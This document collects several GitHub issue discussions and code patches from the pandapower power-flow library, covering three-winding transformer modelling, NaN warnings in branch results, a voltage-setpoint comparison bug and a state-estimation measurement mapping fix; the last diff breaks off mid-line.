Where are these equations from? As far as I understand, all loss factors (like i0_percent for example) are in relation to the rated power of the whole transformer, which is sn_hv_kva. Using min(sn_hv_kva, sn_mv_kva) would mean always using sn_mv_kva, since sn_hv_kva > sn_mv_kva. Why should sn_mv_kva be the reference for the loss parameters?

> in the current implementation, first vsc_percent and vscr_percent are transformed delta-to-wye and then r and x are calculated from them for each of the 3 branches. The right order should be to first calculate x12, x23, x13 and then make the wye-delta transformation.
> In other words, the result is not the same if one first transforms z12, z23, z13 to z1, z2, z3 and then calculates x1, x2, x3... as when one first calculates x12, x23, x13 and then transforms them to x1, x2, x3.

Why do you think this would be the right order, do you have a source for that?

> using shift_mv_degree and shift_lv_degree is not really clear to me? phase shift should be related to the tap, so if there is one tap on a trafo3w, there should be only one phase_shift; then internally this tap should be calculated for each side? if I am not terribly wrong?

The phase shift is not necessarily related to the tap changer, it is primarily related to the transformer vector group. The transformer can have a vector group such that the phase shifts of the mv and lv side are different.

> documentation for the trafo3w should be updated in any case (there is no mention of min(sn_hv_kva, sn_mv_kva))

Yes, it should definitely be updated; let's do it after the refactoring is done.

> by direct generation of branches from 3-winding transformers, there is no need to define a voltage level for the additional bus. All the values are calculated on the side of the additional bus, where we can assume the base (nominal) voltage is equal to the rated one.

I don't quite understand what you mean... Don't you need to define a voltage level for the power flow to work? Or do you mean we don't need it because the values are always in per unit and therefore we just assume 1.0 pu as initial voltage?

> why this: b_img[b_img < 0] = 0 here ?

The magnitude of the magnetizing impedance is defined by i0_percent, the real part of the magnetizing impedance is defined by pfe_kw. If you choose an i0_percent that is small and a pfe_kw that is large, the imaginary part of the magnetizing impedance would become negative and the transformer would have a capacitive behaviour. In that case the imaginary part is set to zero rather than modelling capacitive behaviour in a transformer. This might however be the correct behaviour in 3W transformers, where the transformers are only equivalent transformers and might have parameters which are not physically logical.

In general, I think we should base our validation on commercial software, which is the only way to know if the model is correct. That is what I tried to do with the test [here](https://github.com/lthurner/pandapower/blob/b86ea6dbe0ab92346d8b9ec718a5daf30f6f4d95/pandapower/test/loadflow/test_results.py#L349). The results in there are extracted from PowerFactory, and the voltages match the results from pandapower with a tolerance of 1e-6. That should be the benchmark from my point of view, but we should also add new corner cases (e.g. the one that you experienced where an error occurs).

Hi Leon, here are some comments to your answers (your quotation is in italic):

> when calculating the magnetising admittance, sn_hv_kva is used, and I think min(sn_hv_kva, sn_mv_kva) should be used !? (if I am not terribly wrong?)

I've found that in some ABB technical documentation, and even in some university slides, but I cannot find proof for it in a really relevant source.
I would say even the scheme from PowerFactory's technical reference ([TechRef_3-W-Transformer.pdf](https://github.com/lthurner/pandapower/files/1269364/TechRef_3-W-Transformer.pdf)) for 3-winding transformers shows that `min(sn_hv_kva, sn_mv_kva)` might make sense after all: ![image](https://user-images.githubusercontent.com/9588722/29942262-88770098-8e95-11e7-8107-1252370fede8.png) but afterwards they actually explicitly say: *reference power in PowerFactory is equal to HV-side rated power*. So we can trust PowerFactory and use `sn_hv_kva`.

> result is not the same if one first transforms z12, z23, z13 to z1, z2, z3 and then calculates x1, x2, x3... as when one first calculates x12, x23, x13 and then transforms them to x1, x2, x3. *Why do you think this would be the right order, do you have a source for that?*

This can be shown mathematically (I will show an example for x1): if you first calculate x12, x23 and x13 and then do the wye-delta conversion to get x1 from x12, x23 and x13: ![image](https://user-images.githubusercontent.com/9588722/29943724-d9378c1e-8e9a-11e7-96b0-f0b3664604b5.png) alternatively, if you first do the wye-delta transformation on z and r, i.e. transform z12, z13 and z23 to z1, z2 and z3, and then calculate x1: ![image](https://user-images.githubusercontent.com/9588722/29943816-3eb09662-8e9b-11e7-8d93-dc0cab001a3f.png) now if you compare the first and second equations and expand them, you can see that: ![image](https://user-images.githubusercontent.com/9588722/29943846-5c60c894-8e9b-11e7-82a3-b4f26ec15adf.png) the question remains: which method is correct? I believe (I will try to find some relevant reference) the first, because the impedance should be considered in the wye-delta conversion as a vector, not only as an amplitude (as considered in the second case)... so in the first case this equation holds: ![image](https://user-images.githubusercontent.com/9588722/29944586-4be42864-8e9e-11e7-8697-7caa6e3a09df.png)

> *The phase shift is not necessarily related to the tap changer...*

Oh, it is only now clear to me that by `shift_degree` you meant the transformer vector group and clock hour number, and not a phase-shifting transformer. This is quite a different thing, so only now I also understand why `calculate_voltage_angles` defaults to `False` for transmission... So for proper consideration of a phase-shifting transformer an additional parameter (such as *du* in PowerFactory) should be added? Attached is the PowerFactory technical reference for the 2w transformer, to show what I mean about the tap of a phase-shifting transformer: [TechRef_2-W-Transformer_3Phase.pdf](https://github.com/lthurner/pandapower/files/1269365/TechRef_2-W-Transformer_3Phase.pdf)

> there is no need to define voltage level of the additional bus. *Or do you mean we don't need it because the values are always in per unit and therefore we just assume 1.0 pu as initial voltage?*

Exactly, that's what I meant... it does not matter which voltage level is assigned to the auxiliary bus, since it is used only internally and its p.u. value will always be 1 p.u. :)

> In general, I think we should base our validation on commercial software

I completely agree... I'll try to make the model pass all the validation tests against the PowerFactory results...
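Since the equations in this comment are embedded images, here is a hedged sketch of the algebra presumably at stake, written with the standard per-unit star-equivalent formula for a three-winding transformer (an assumption; the images may use a different but equivalent form). Because this delta-to-wye mapping is linear in the complex impedances, applying it component-wise to $r$ and $x$ reproduces the complex ("vector") result, while applying it to the magnitudes $|\underline{z}|$ does not:

$$
\underline{z}_1=\tfrac{1}{2}\left(\underline{z}_{12}+\underline{z}_{13}-\underline{z}_{23}\right)
\;\Rightarrow\;
r_1=\tfrac{1}{2}\left(r_{12}+r_{13}-r_{23}\right),\qquad
x_1=\tfrac{1}{2}\left(x_{12}+x_{13}-x_{23}\right),
$$

whereas transforming the magnitudes first gives

$$
x_1'=\sqrt{\Big(\tfrac{1}{2}\big(|\underline{z}_{12}|+|\underline{z}_{13}|-|\underline{z}_{23}|\big)\Big)^{2}-r_1^{2}}
\;\neq\;x_1\ \text{in general},
$$

and the expression under the square root can even turn negative, which is exactly the NaN failure reported in the issue.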
Hi Jakov, looks like we agree in most aspects 👍 The question of the wye-delta transformation is still open, but if you can investigate both approaches, it would be interesting to compare the results.

> So for proper consideration of a phase-shifting transformer an additional parameter (such as du in PowerFactory) should be added?

In the two-winding transformer model there is a parameter "trafo.tp_st_degree" to model phase-shifting transformers, but it has not been implemented for 3W transformers yet.

I removed the code that is currently unused. For now I am closing this issue, since nobody currently seems to be working on this and there also wasn't any test data supplied for a case where this problem occurs. @jkrstulo if you want to continue working on this, feel free to reopen the issue and recover the code from this commit!
2018-04-25T11:24:41
e2nIEE/pandapower
136
e2nIEE__pandapower-136
[ "132" ]
0fe4315805ec5bb5e20797e20378203752fa51b6
diff --git a/pandapower/build_branch.py b/pandapower/build_branch.py
--- a/pandapower/build_branch.py
+++ b/pandapower/build_branch.py
@@ -497,6 +497,8 @@ def _trafo_df_from_trafo3w(net):
         i += 1
 
     trafo_df = pd.DataFrame.from_dict(trafos2w, orient="index")
+    if any(trafo_df.vsc_percent==0):
+        raise UserWarning("Equivalent transformer with zero impedance!")
     return trafo_df
3W transformer equivalent can have zero impedance

For three-winding transformers with specific parameters it is possible to get equivalent transformers with zero impedance. While this is probably due to bad data, pandapower currently does not check for it, and the power flow does not converge, with the warning

```
RuntimeWarning: divide by zero encountered in true_divide
Ysf = stat / (branch[:, BR_R] + 1j * branch[:, BR_X])  ## series admittance
```

While this is a clear hint at the problem, finding the faulty element is not very straightforward. I suggest at least a check in `_trafo_df_from_trafo3w()` like the following:

```
if any(trafo_df.vsc_percent==0):
    raise UserWarning("Equivalent Trafo with zero impedance!")
```

One could also add a small impedance to let the power flow continue...
The transformer in my case has the following parameters:

```
std_type           None
hv_bus             24
mv_bus             25
lv_bus             23
sn_hv_kva          140000
sn_mv_kva          70000
sn_lv_kva          70000
vn_hv_kv           150
vn_mv_kv           22
vn_lv_kv           22
vsc_hv_percent     12
vsc_mv_percent     24
vsc_lv_percent     12
vscr_hv_percent    0
vscr_mv_percent    0
vscr_lv_percent    0
pfe_kw             0
i0_percent         0
in_service         True
```
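A back-of-the-envelope star conversion of these pair values shows where the zero comes from (pandapower additionally rescales by the rated powers internally, but with sn_mv_kva == sn_lv_kva the cancellation works out the same way):

```python
# Pairwise short-circuit voltages from the table above, in percent
vsc_hv, vsc_mv, vsc_lv = 12.0, 24.0, 12.0   # hv-mv, mv-lv, lv-hv pairs

# Star (wye) equivalent of the three pair measurements
z_hv = (vsc_hv + vsc_lv - vsc_mv) / 2   # (12 + 12 - 24) / 2 = 0.0
z_mv = (vsc_hv + vsc_mv - vsc_lv) / 2   # 12.0
z_lv = (vsc_mv + vsc_lv - vsc_hv) / 2   # 12.0

print(z_hv, z_mv, z_lv)  # the hv equivalent winding ends up with zero impedance
```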
2018-07-26T09:04:04
e2nIEE/pandapower
138
e2nIEE__pandapower-138
[ "137" ]
e1f7ed31e9dec3c412e8fde26591a2ba697e96ea
diff --git a/pandapower/results_branch.py b/pandapower/results_branch.py
--- a/pandapower/results_branch.py
+++ b/pandapower/results_branch.py
@@ -112,7 +112,8 @@ def _get_trafo_results(net, ppc, s_ft, i_ft):
         vns = np.vstack([trafo_df["vn_hv_kv"].values, trafo_df["vn_lv_kv"].values]).T
         lds_trafo = i_ft[f:t] * vns * 1000. * np.sqrt(3) \
             / trafo_df["sn_kva"].values[:, np.newaxis] * 100.
-        ld_trafo = np.max(lds_trafo, axis=1)
+        with np.errstate(invalid='ignore'):
+            ld_trafo = np.max(lds_trafo, axis=1)
     elif trafo_loading == "power":
         ld_trafo = np.max(s_ft[f:t] / net["trafo"]["sn_kva"].values[:, np.newaxis] * 100., axis=1)
     else:
@@ -182,7 +183,8 @@ def _get_trafo3w_results(net, ppc, s_ft, i_ft):
         ld_h = i_h * t3["vn_hv_kv"].values * 1000. * np.sqrt(3) / t3["sn_hv_kva"].values * 100
         ld_m = i_m * t3["vn_mv_kv"].values * 1000. * np.sqrt(3) / t3["sn_mv_kva"].values * 100
         ld_l = i_l * t3["vn_lv_kv"].values * 1000. * np.sqrt(3) / t3["sn_lv_kva"].values * 100
-        ld_trafo = np.max(np.vstack([ld_h, ld_m, ld_l]), axis=0)
+        with np.errstate(invalid='ignore'):
+            ld_trafo = np.max(np.vstack([ld_h, ld_m, ld_l]), axis=0)
     elif trafo_loading == "power":
         ld_h = s_ft[:, 0][f:hv] / t3["sn_hv_kva"] * 100.
         ld_m = s_ft[:, 1][hv:mv] / t3["sn_mv_kva"] * 100.
@@ -274,5 +276,7 @@ def _get_switch_results(net, i_ft):
     if not "switch" in net._pd2ppc_lookups["branch"]:
         return
     f, t = net._pd2ppc_lookups["branch"]["switch"]
-    net["res_switch"] = pd.DataFrame(data=np.max(i_ft[f:t], axis=1), columns=["i_ka"],
+    with np.errstate(invalid='ignore'):
+        i_ka = np.max(i_ft[f:t], axis=1)
+    net["res_switch"] = pd.DataFrame(data=i_ka, columns=["i_ka"],
                                      index=net.switch[net._closed_bb_switches].index)
NaN results in branch current

Running a power flow with oos buses (BUS_TYPE=NONE) in the ppc results in warnings when calculating the branch results, because these buses have no voltage results:

```
RuntimeWarning: invalid value encountered in reduce
  return umr_maximum(a, axis, None, out, keepdims)
```

A possible fix is in https://github.com/WinfriedL/pandapower/commit/0f09276c3f2bb1544acb8bd2d42c9980b15902e5

Not sure if this is the best solution...
I also remember there was some inconsistency in the branch results. I think out_of_service lines have a loading of zero percent, while disconnected lines have nan or something like that? Is this issue related?

> I think out_of_service lines have a loading of zero percent, while disconnected lines have nan or something like that? Is this issue related?

Yes, I think this is exactly the issue. Isolated lines have no voltage result (nan) at the from/to bus, so dividing s_ft (which is zero) by u_ft gives nan results for i_ft and loading_percent. The question is whether nan is a valid power flow result for isolated buses/lines. If not, maybe there should be no nan result for the bus voltage in the first place. However, a 'correct' voltage result for isolated buses would be zero, but this would also lead to nan results for lines. Maybe a better defined approach would be `i_ft = np.where(s_ft==0., 0., s_ft * 1e-3 / u_ft / np.sqrt(3))` instead of brute-force filling all nan and inf values... If nan results are valid, maybe the warning should be suppressed with np.seterr()?

After talking to @SteffenMeinecke, the issue that I remembered was that lines with two open switches at both sides have a loading of zero, while all other disconnected/out of service lines have nan. This is a different issue that comes from the fact that we explicitly deal with the "open switches at both sides of the line" case as a special case. So it's not exactly the same issue, but related.

> The question is if nan is a valid powerflow result for isolated buses/lines. If not, maybe there should be no nan result for the bus voltage in the first place. However, a 'correct' voltage result for isolated buses would be zero, but this would also lead to nan results for lines.

It's true that it would be physically correct to say a disconnected bus has zero voltage, but one could also argue that the power flow doesn't calculate a voltage value for that bus, and therefore no number is assigned. From a practical perspective, I like the clear differentiation between "result" (a number) and "no result" (not a number). It wouldn't be very practical always having to filter out the 0 values when calculating, for example, the minimum voltage or average line loading in a grid.

> If nan results are valid, maybe the warning should be suppressed with np.seterr()?

That however changes the behaviour numpy-wide, even outside pandapower. What version of numpy are you using, btw? I can't reproduce the warning with numpy 1.14.5. Does this:

```
np.array([1,np.nan,3]) / np.array([3,4,np.nan])
```

give a warning for you? Or am I looking at the wrong case here?

> Does this: np.array([1,np.nan,3]) / np.array([3,4,np.nan]) give a warning for you? Or am I looking at the wrong case here?

No, the line giving the warning is in fact this one: https://github.com/e2nIEE/pandapower/blob/5516e064f6e807ab38e4bc2f28f5239ea4627341/pandapower/results_branch.py#L66 I should have mentioned that before, sorry.

> I like the clear differentiation between "result" (a number) and "no result" (not a number)

So the issue would be how to get np.max() to return nan without issuing a warning about it... Of course this is not high priority, since in principle everything works, but always getting a RuntimeWarning when everything works as intended seems kind of awkward.

> Of course this is not high priority, since in principle everything works, but always having a RuntimeWarning when everything works as intended seems kind of awkward.

Definitely.
Seems like this warning was only recently introduced; at least with numpy 1.11 I don't get it. Instead of using np.seterr, I suggest using np.errstate to suppress the warning only in this line:

```
with np.errstate(invalid='ignore'):
    i_ka = np.max(i_ft[f:t], axis=1)
```

I pushed the fix as suggested above. I also checked on the two-open-switches-at-one-line issue as described above, and it seems that it has since been fixed and now also returns nan results, so everything seems to be consistent. So if the fix works for you, this issue can be closed?

Yes, this can be closed, thanks!

I closed too early. Not surprisingly, the same now happens for transformer branches. np.max() is not used for impedances, so there should be no problem there. But switches use it, I guess only if switches have a resistance? The fix should be straightforward; should I do it and make a pull request, or do you want to add it yourself?
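For reference, a minimal example of the scoped suppression (whether the plain reduction warns depends on the numpy version; newer versions emit the warning, 1.11 reportedly does not):

```python
import numpy as np

i_ft = np.array([[0.4, 0.5],
                 [np.nan, np.nan]])   # e.g. a disconnected branch

# Plain reduction warns on newer numpy:
# RuntimeWarning: invalid value encountered in reduce
i_ka = np.max(i_ft, axis=1)

# Scoped suppression keeps the nan result but stays silent, and unlike
# np.seterr() it only affects the with-block:
with np.errstate(invalid='ignore'):
    i_ka = np.max(i_ft, axis=1)      # -> array([0.5, nan])
```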
2018-07-31T08:34:54
e2nIEE/pandapower
221
e2nIEE__pandapower-221
[ "216", "216" ]
f01d0efea8b6d46146077d2ea64c18142eb15291
diff --git a/pandapower/build_gen.py b/pandapower/build_gen.py
--- a/pandapower/build_gen.py
+++ b/pandapower/build_gen.py
@@ -460,4 +460,4 @@ def _different_values_at_one_bus(buses, values):
     # have the voltage of the first generator at that bus
     values_equal = first_values[buses]
 
-    return not np.array_equal(values, values_equal)
+    return not np.allclose(values, values_equal)
pp.runpp fails with "Generators with different voltage setpoints connected to the same bus", BUT all setpoints are equal in the grid model.

Hi, in build_gen.py (line 463) an equality check is made. But due to some conversions made before, this check fails:

``` python
values       = [1.00999999 1.00999999 1.00999999 1.00999999 1.         1.01       1.        ]
values_equal = [1.00999999 1.00999999 1.00999999 1.00999999 1.         1.00999999 1.        ]
```

Attached is the problematic grid in pickle, using pandapower 1.6.0 develop commit b7136d72ca66a1fcfdcf2460d40c35dac38f02a0 and python 3.7

```
Traceback (most recent call last):
  File "C:\Anaconda3\envs\py37\lib\site-packages\pandapower\run.py", line 294, in runpp
    _powerflow(net, **kwargs)
  File "C:\Anaconda3\envs\py37\lib\site-packages\pandapower\powerflow.py", line 66, in _powerflow
    ppc, ppci = _pd2ppc(net)
  File "C:\Anaconda3\envs\py37\lib\site-packages\pandapower\pd2ppc.py", line 114, in _pd2ppc
    _check_voltage_setpoints_at_same_bus(ppc)
  File "C:\Anaconda3\envs\py37\lib\site-packages\pandapower\build_gen.py", line 437, in _check_voltage_setpoints_at_same_bus
    raise UserWarning("Generators with different voltage setpoints connected to the same bus")
UserWarning: Generators with different voltage setpoints connected to the same bus
```

BR V3
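The fix that went in replaces the bit-wise comparison with a tolerance-based one; a minimal illustration with values like those in the failing check:

```python
import numpy as np

# Setpoints that are equal up to float rounding, as in the report above
values       = np.array([1.00999999, 1.0, 1.01])
values_equal = np.array([1.00999999, 1.0, 1.00999999])

print(np.array_equal(values, values_equal))  # False: exact element-wise comparison
print(np.allclose(values, values_equal))     # True: within default rtol/atol
```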
2018-11-26T16:09:55
e2nIEE/pandapower
249
e2nIEE__pandapower-249
[ "248" ]
e3ca203de59e37b22dd5309794cd94202608a852
diff --git a/pandapower/estimation/wls_ppc_conversions.py b/pandapower/estimation/wls_ppc_conversions.py --- a/pandapower/estimation/wls_ppc_conversions.py +++ b/pandapower/estimation/wls_ppc_conversions.py @@ -66,19 +66,30 @@ def _add_measurements_to_ppc(net, ppci): std_logger.warning("Measurement defined in pp-grid does not exist in ppci! Will be deleted!") meas_bus = meas_bus[map_bus[meas_bus['element']] < ppci["bus"].shape[0]] - map_line, map_trafo, map_trafo3w = None, None, None # mapping to dict instead of np array ensures good performance for large indices # (e.g., 999999999 requires a large np array even if there are only 2 buses) # downside is loop comprehension to access the map + map_line, map_trafo, map_trafo3w = None, None, None + branch_mask = ppci['internal']['branch_is'] if "line" in net["_pd2ppc_lookups"]["branch"]: - map_line = dict(zip(net.line.index, range(*net["_pd2ppc_lookups"]["branch"]["line"]))) + map_line = {line_ix: br_ix for line_ix, br_ix in + zip(net.line.index, range(*net["_pd2ppc_lookups"]["branch"]["line"])) if branch_mask[br_ix]} + if "trafo" in net["_pd2ppc_lookups"]["branch"]: - map_trafo = dict(zip(net.trafo.index, range(*net["_pd2ppc_lookups"]["branch"]["trafo"]))) + trafo_ix_start, trafo_ix_end = net["_pd2ppc_lookups"]["branch"]["trafo"] + trafo_ix_offset = np.sum(~branch_mask[:trafo_ix_start]) + trafo_ix_start, trafo_ix_end = trafo_ix_start - trafo_ix_offset, trafo_ix_end - trafo_ix_offset + map_trafo = {trafo_ix: br_ix for trafo_ix, br_ix in + zip(net.trafo.index, range(trafo_ix_start, trafo_ix_end)) + if branch_mask[br_ix+trafo_ix_offset]} if "trafo3w" in net["_pd2ppc_lookups"]["branch"]: - map_trafo3w = {ix: {'hv': br_ix, 'mv': br_ix+1, 'lv': br_ix+2} - for ix, br_ix in zip(net.trafo3w.index, - range(*(net["_pd2ppc_lookups"]["branch"]["trafo3w"]+(3,))))} + trafo3w_ix_start, trafo3w_ix_end = net["_pd2ppc_lookups"]["branch"]["trafo3w"] + trafo3w_ix_offset = np.sum(~branch_mask[:trafo3w_ix_start]) + trafo3w_ix_start, trafo3w_ix_end = trafo3w_ix_start - trafo3w_ix_offset, trafo3w_ix_end - trafo3w_ix_offset + map_trafo3w = {trafo3w_ix: {'hv': br_ix, 'mv': br_ix+1, 'lv': br_ix+2} for trafo3w_ix, br_ix in + zip(net.trafo3w.index, range(trafo3w_ix_start, trafo3w_ix_end, 3)) + if branch_mask[br_ix+trafo3w_ix_offset]} # set measurements for ppc format # add 9 columns to ppc[bus] for Vm, Vm std dev, P, P std dev, Q, Q std dev, @@ -120,52 +131,56 @@ def _add_measurements_to_ppc(net, ppci): branch_append = np.full((ppci["branch"].shape[0], branch_cols_se), np.nan, dtype=ppci["branch"].dtype) - i_measurements = meas[(meas.measurement_type == "i") & (meas.element_type == "line")] - if len(i_measurements): - meas_from = i_measurements[(i_measurements.side.values.astype(int) == - net.line.from_bus[i_measurements.element]).values] - meas_to = i_measurements[(i_measurements.side.values.astype(int) == - net.line.to_bus[i_measurements.element]).values] - ix_from = [map_line[l] for l in meas_from.element.values.astype(int)] - ix_to = [map_line[l] for l in meas_to.element.values.astype(int)] - i_ka_to_pu_from = (net.bus.vn_kv[meas_from.side]).values * 1e3 - i_ka_to_pu_to = (net.bus.vn_kv[meas_to.side]).values * 1e3 - branch_append[ix_from, IM_FROM] = meas_from.value.values * i_ka_to_pu_from - branch_append[ix_from, IM_FROM_STD] = meas_from.std_dev.values * i_ka_to_pu_from - branch_append[ix_from, IM_FROM_IDX] = meas_from.index.values - branch_append[ix_to, IM_TO] = meas_to.value.values * i_ka_to_pu_to - branch_append[ix_to, IM_TO_STD] = meas_to.std_dev.values * 
i_ka_to_pu_to - branch_append[ix_to, IM_TO_IDX] = meas_to.index.values - - p_measurements = meas[(meas.measurement_type == "p") & (meas.element_type == "line")] - if len(p_measurements): - meas_from = p_measurements[(p_measurements.side.values.astype(int) == - net.line.from_bus[p_measurements.element]).values] - meas_to = p_measurements[(p_measurements.side.values.astype(int) == - net.line.to_bus[p_measurements.element]).values] - ix_from = [map_line[l] for l in meas_from.element.values.astype(int)] - ix_to = [map_line[l] for l in meas_to.element.values.astype(int)] - branch_append[ix_from, P_FROM] = meas_from.value.values - branch_append[ix_from, P_FROM_STD] = meas_from.std_dev.values - branch_append[ix_from, P_FROM_IDX] = meas_from.index.values - branch_append[ix_to, P_TO] = meas_to.value.values - branch_append[ix_to, P_TO_STD] = meas_to.std_dev.values - branch_append[ix_to, P_TO_IDX] = meas_to.index.values - - q_measurements = meas[(meas.measurement_type == "q") & (meas.element_type == "line")] - if len(q_measurements): - meas_from = q_measurements[(q_measurements.side.values.astype(int) == - net.line.from_bus[q_measurements.element]).values] - meas_to = q_measurements[(q_measurements.side.values.astype(int) == - net.line.to_bus[q_measurements.element]).values] - ix_from = [map_line[l] for l in meas_from.element.values.astype(int)] - ix_to = [map_line[l] for l in meas_to.element.values.astype(int)] - branch_append[ix_from, Q_FROM] = meas_from.value.values - branch_append[ix_from, Q_FROM_STD] = meas_from.std_dev.values - branch_append[ix_from, Q_FROM_IDX] = meas_from.index.values - branch_append[ix_to, Q_TO] = meas_to.value.values - branch_append[ix_to, Q_TO_STD] = meas_to.std_dev.values - branch_append[ix_to, Q_TO_IDX] = meas_to.index.values + if map_line is not None: + i_measurements = meas[(meas.measurement_type == "i") & (meas.element_type == "line") &\ + meas.element.isin(map_line)] + if len(i_measurements): + meas_from = i_measurements[(i_measurements.side.values.astype(int) == + net.line.from_bus[i_measurements.element]).values] + meas_to = i_measurements[(i_measurements.side.values.astype(int) == + net.line.to_bus[i_measurements.element]).values] + ix_from = [map_line[l] for l in meas_from.element.values.astype(int)] + ix_to = [map_line[l] for l in meas_to.element.values.astype(int)] + i_ka_to_pu_from = (net.bus.vn_kv[meas_from.side]).values * 1e3 + i_ka_to_pu_to = (net.bus.vn_kv[meas_to.side]).values * 1e3 + branch_append[ix_from, IM_FROM] = meas_from.value.values * i_ka_to_pu_from + branch_append[ix_from, IM_FROM_STD] = meas_from.std_dev.values * i_ka_to_pu_from + branch_append[ix_from, IM_FROM_IDX] = meas_from.index.values + branch_append[ix_to, IM_TO] = meas_to.value.values * i_ka_to_pu_to + branch_append[ix_to, IM_TO_STD] = meas_to.std_dev.values * i_ka_to_pu_to + branch_append[ix_to, IM_TO_IDX] = meas_to.index.values + + p_measurements = meas[(meas.measurement_type == "p") & (meas.element_type == "line") & + meas.element.isin(map_line)] + if len(p_measurements): + meas_from = p_measurements[(p_measurements.side.values.astype(int) == + net.line.from_bus[p_measurements.element]).values] + meas_to = p_measurements[(p_measurements.side.values.astype(int) == + net.line.to_bus[p_measurements.element]).values] + ix_from = [map_line[l] for l in meas_from.element.values.astype(int)] + ix_to = [map_line[l] for l in meas_to.element.values.astype(int)] + branch_append[ix_from, P_FROM] = meas_from.value.values + branch_append[ix_from, P_FROM_STD] = meas_from.std_dev.values + 
branch_append[ix_from, P_FROM_IDX] = meas_from.index.values + branch_append[ix_to, P_TO] = meas_to.value.values + branch_append[ix_to, P_TO_STD] = meas_to.std_dev.values + branch_append[ix_to, P_TO_IDX] = meas_to.index.values + + q_measurements = meas[(meas.measurement_type == "q") & (meas.element_type == "line") & + meas.element.isin(map_line)] + if len(q_measurements): + meas_from = q_measurements[(q_measurements.side.values.astype(int) == + net.line.from_bus[q_measurements.element]).values] + meas_to = q_measurements[(q_measurements.side.values.astype(int) == + net.line.to_bus[q_measurements.element]).values] + ix_from = [map_line[l] for l in meas_from.element.values.astype(int)] + ix_to = [map_line[l] for l in meas_to.element.values.astype(int)] + branch_append[ix_from, Q_FROM] = meas_from.value.values + branch_append[ix_from, Q_FROM_STD] = meas_from.std_dev.values + branch_append[ix_from, Q_FROM_IDX] = meas_from.index.values + branch_append[ix_to, Q_TO] = meas_to.value.values + branch_append[ix_to, Q_TO_STD] = meas_to.std_dev.values + branch_append[ix_to, Q_TO_IDX] = meas_to.index.values # TODO review in 2019 -> is this a use case? create test with switches on lines # determine number of lines in ppci["branch"] @@ -180,120 +195,128 @@ def _add_measurements_to_ppc(net, ppci): # & (np.in1d(net["switch"]["element"].values, lines_is.index)) \ # & (np.in1d(net["switch"]["bus"].values, bus_is_idx)) # ppci_lines = len(lines_is) - np.count_nonzero(slidx) - - i_tr_measurements = meas[(meas.measurement_type == "i") & (meas.element_type == "trafo")] - if len(i_tr_measurements): - meas_from = i_tr_measurements[(i_tr_measurements.side.values.astype(int) == - net.trafo.hv_bus[i_tr_measurements.element]).values] - meas_to = i_tr_measurements[(i_tr_measurements.side.values.astype(int) == - net.trafo.lv_bus[i_tr_measurements.element]).values] - ix_from = [map_trafo[t] for t in meas_from.element.values.astype(int)] - ix_to = [map_trafo[t] for t in meas_to.element.values.astype(int)] - i_ka_to_pu_from = (net.bus.vn_kv[meas_from.side]).values * 1e3 - i_ka_to_pu_to = (net.bus.vn_kv[meas_to.side]).values * 1e3 - branch_append[ix_from, IM_FROM] = meas_from.value.values * i_ka_to_pu_from - branch_append[ix_from, IM_FROM_STD] = meas_from.std_dev.values * i_ka_to_pu_from - branch_append[ix_from, IM_FROM_IDX] = meas_from.index.values - branch_append[ix_to, IM_TO] = meas_to.value.values * i_ka_to_pu_to - branch_append[ix_to, IM_TO_STD] = meas_to.std_dev.values * i_ka_to_pu_to - branch_append[ix_to, IM_TO_IDX] = meas_to.index.values - - p_tr_measurements = meas[(meas.measurement_type == "p") & (meas.element_type == "trafo")] - if len(p_tr_measurements): - meas_from = p_tr_measurements[(p_tr_measurements.side.values.astype(int) == - net.trafo.hv_bus[p_tr_measurements.element]).values] - meas_to = p_tr_measurements[(p_tr_measurements.side.values.astype(int) == - net.trafo.lv_bus[p_tr_measurements.element]).values] - ix_from = [map_trafo[t] for t in meas_from.element.values.astype(int)] - ix_to = [map_trafo[t] for t in meas_to.element.values.astype(int)] - branch_append[ix_from, P_FROM] = meas_from.value.values - branch_append[ix_from, P_FROM_STD] = meas_from.std_dev.values - branch_append[ix_from, P_FROM_IDX] = meas_from.index.values - branch_append[ix_to, P_TO] = meas_to.value.values - branch_append[ix_to, P_TO_STD] = meas_to.std_dev.values - branch_append[ix_to, P_TO_IDX] = meas_to.index.values - - q_tr_measurements = meas[(meas.measurement_type == "q") & (meas.element_type == "trafo")] - if 
len(q_tr_measurements): - meas_from = q_tr_measurements[(q_tr_measurements.side.values.astype(int) == - net.trafo.hv_bus[q_tr_measurements.element]).values] - meas_to = q_tr_measurements[(q_tr_measurements.side.values.astype(int) == - net.trafo.lv_bus[q_tr_measurements.element]).values] - ix_from = [map_trafo[t] for t in meas_from.element.values.astype(int)] - ix_to = [map_trafo[t] for t in meas_to.element.values.astype(int)] - branch_append[ix_from, Q_FROM] = meas_from.value.values - branch_append[ix_from, Q_FROM_STD] = meas_from.std_dev.values - branch_append[ix_from, Q_FROM_IDX] = meas_from.index.values - branch_append[ix_to, Q_TO] = meas_to.value.values - branch_append[ix_to, Q_TO_STD] = meas_to.std_dev.values - branch_append[ix_to, Q_TO_IDX] = meas_to.index.values + + if map_trafo is not None: + i_tr_measurements = meas[(meas.measurement_type == "i") & (meas.element_type == "trafo") & + meas.element.isin(map_trafo)] + if len(i_tr_measurements): + meas_from = i_tr_measurements[(i_tr_measurements.side.values.astype(int) == + net.trafo.hv_bus[i_tr_measurements.element]).values] + meas_to = i_tr_measurements[(i_tr_measurements.side.values.astype(int) == + net.trafo.lv_bus[i_tr_measurements.element]).values] + ix_from = [map_trafo[t] for t in meas_from.element.values.astype(int)] + ix_to = [map_trafo[t] for t in meas_to.element.values.astype(int)] + i_ka_to_pu_from = (net.bus.vn_kv[meas_from.side]).values * 1e3 + i_ka_to_pu_to = (net.bus.vn_kv[meas_to.side]).values * 1e3 + branch_append[ix_from, IM_FROM] = meas_from.value.values * i_ka_to_pu_from + branch_append[ix_from, IM_FROM_STD] = meas_from.std_dev.values * i_ka_to_pu_from + branch_append[ix_from, IM_FROM_IDX] = meas_from.index.values + branch_append[ix_to, IM_TO] = meas_to.value.values * i_ka_to_pu_to + branch_append[ix_to, IM_TO_STD] = meas_to.std_dev.values * i_ka_to_pu_to + branch_append[ix_to, IM_TO_IDX] = meas_to.index.values + + p_tr_measurements = meas[(meas.measurement_type == "p") & (meas.element_type == "trafo") & + meas.element.isin(map_trafo)] + if len(p_tr_measurements): + meas_from = p_tr_measurements[(p_tr_measurements.side.values.astype(int) == + net.trafo.hv_bus[p_tr_measurements.element]).values] + meas_to = p_tr_measurements[(p_tr_measurements.side.values.astype(int) == + net.trafo.lv_bus[p_tr_measurements.element]).values] + ix_from = [map_trafo[t] for t in meas_from.element.values.astype(int)] + ix_to = [map_trafo[t] for t in meas_to.element.values.astype(int)] + branch_append[ix_from, P_FROM] = meas_from.value.values + branch_append[ix_from, 